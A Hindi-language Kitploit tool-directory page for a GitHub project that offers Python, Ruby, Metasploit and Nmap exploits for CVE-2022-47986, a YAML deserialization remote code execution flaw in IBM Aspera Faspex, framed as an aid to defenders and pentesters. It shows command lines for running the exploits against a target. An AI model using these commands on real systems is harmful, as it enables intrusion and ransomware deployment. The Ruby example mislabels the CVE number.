Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-47986 — CVE-2022-47986: Python, Ruby, NMAP और Metasploit मॉड्यूल जो इस भेद्यता का शोषण करने के लिए हैं। | Kitploit
उपकरण/GitHubGitHub/mauricelambert/cve-2022-47986
शोषण फ्रेमवर्कशोषणवेब एप्लिकेशन शोषण
GitHubmauricelambert/cve-2022-47986

CVE-2022-47986

CVE-2022-47986: Python, Ruby, NMAP और Metasploit मॉड्यूल जो इस भेद्यता का शोषण करने के लिए हैं।

रिपॉजिटरी देखें
213 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-47986

क्यों

यह भेद्यता वास्तविक दुनिया में शोषित की जा रही है। IceFire इस भेद्यता का उपयोग लक्षित सिस्टम पर रैनसमवेयर तैनात करने के लिए करता है, मैं SOC/ब्लू टीमों को प्रभावित सिस्टम की पहचान करने और पेंटेस्टर/रेड टीमों को इसका शोषण करने और रिपोर्ट करने में मदद करना चाहता हूँ।

विवरण

मैं YAML डिसेरिएलाइज़ेशन से IBM Aspera Faspex पर RCE (दूरस्थ कोड निष्पादन) उत्पन्न करने वाली भेद्यता का शोषण करने के लिए शुद्ध पायथन और रूबी स्क्रिप्ट, मेटास्प्लॉइट और nmap मॉड्यूल प्रस्तावित करता हूँ।

शोषण: RCE (दूरस्थ कोड निष्पादन)

Python

root@kitploit:~
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

root@kitploit:~
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

root@kitploit:~
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

root@kitploit:~
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

स्रोत

  • IBM
  • nvd.nist.gov
  • ब्लॉग - शोषण
  • thehackernews - icefire द्वारा शोषित
  • thehackernews - CISA KEV कैटलॉग

लाइसेंस

GPL, संस्करण 3 के अंतर्गत लाइसेंस प्राप्त।

टूल डाउनलोड करें